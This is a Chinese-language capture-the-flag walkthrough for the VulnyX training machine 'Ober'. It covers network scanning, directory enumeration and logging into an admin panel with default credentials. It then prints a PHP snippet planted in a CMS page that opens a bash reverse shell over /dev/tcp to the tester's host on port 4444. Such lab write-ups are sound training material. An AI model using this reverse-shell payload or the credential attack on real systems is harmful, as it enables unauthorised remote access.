vulnyx靶机：Ober

vulnyx简介

vulnyx是一个提供各种漏洞环境的靶场平台，大部分环境是做好的虚拟机镜像文件，镜像预先设计了多种漏洞，需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标，挑战的目标是获取操作系统的root权限和查看flag。

部署方法

下载地址：VulNyx | Offensive Security Playground

下载下来解压。这里我用的是Oracle VirtualBox。

一，信息收集

我是用kali的arp-scan，也可以用namp扫网段扫出来。这里可以用很多工具扫出来之举例一种。

arp-scan -I eth0 -l

• -I 指定eth1这个网卡
• -l 扫描出全部主机

我们知道靶机的IP地址在192.168.30.56

nmap 192.168.30.56 -A -O -p-

• -A 进行全面扫描，包括服务版本探测、操作系统检测等。
• -O 进行操作系统检测，尝试识别远程主机的操作系统类型。
• -p 指定要扫描的端口范围或特定端口，如1-65535或80,443。后使用namp扫描靶机。

开放22，80端口，8080端口。

扫一下80和8080端口目录。

gobuster dir -u http://192.168.30.56/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -x php,jsp,html,db,txt,xml

也是拿到后台了。抓包爆破一下。

账号和密码都是admin，这里爆破太多会停止admin用户。

admin
admin

登录后台之后找一下有没有弹shell的地方。

这里就简单多了。添加一个网页，找一个这个cms弹shell的写法，然后访问一下就弹shell回来了。

function onStart() { echo exec('bash -c "bash -i >& /dev/tcp/192.168.30.3/4444 0>&1"'); }

然后安排老三套。

这里直接给root密码了。那就结束了。

直接就结束了，但是我看到这个靶机还有一个用户。但是都直接拿到root了就没必要了。